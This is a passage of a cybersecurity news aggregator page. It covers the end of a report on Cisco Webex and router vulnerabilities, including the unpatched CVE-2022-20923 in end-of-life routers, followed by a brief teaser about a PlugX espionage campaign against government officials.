“A vulnerability in the messaging interface of Cisco Webex App, formerly Webex Teams, could allow an unauthenticated, remote attacker to manipulate links or other content within the messaging interface.” reads the advisory. “This vulnerability exists because the affected software does not properly handle character rendering. An attacker could exploit this vulnerability by sending messages within the application interface. A successful exploit could allow the attacker to modify the display of links or other content within the interface, potentially allowing the attacker to conduct phishing or spoofing attacks.”

The fourth issue fixed by the vendor is an authentication bypass flaw, tracked CVE-2022-20923 (CVSS score: 4.0) that affects Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers.

The bad news for the customers is that the company will not fix the products reaching end-of-life (EOL).

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, NVIDIA)

The post Cisco will not fix the authentication bypass flaw in EoL routers appeared first on Security Affairs.

Categories: Cyber Security News

Chinese Hackers Target Government Officials in Europe, South America and Middle East

The Hacker News - Thu, 09/08/2022 - 07:02
A Chinese hacking group has been attributed to a new campaign aimed at infecting government officials in Europe, the Middle East, and South America with a modular malware known as PlugX. Cybersecurity firm Secureworks said it identified the intrusions in June and July 2022, once again demonstrating the adversary's continued focus on espionage against governments around the world. "PlugX is
Categories: Cyber Security News

Pages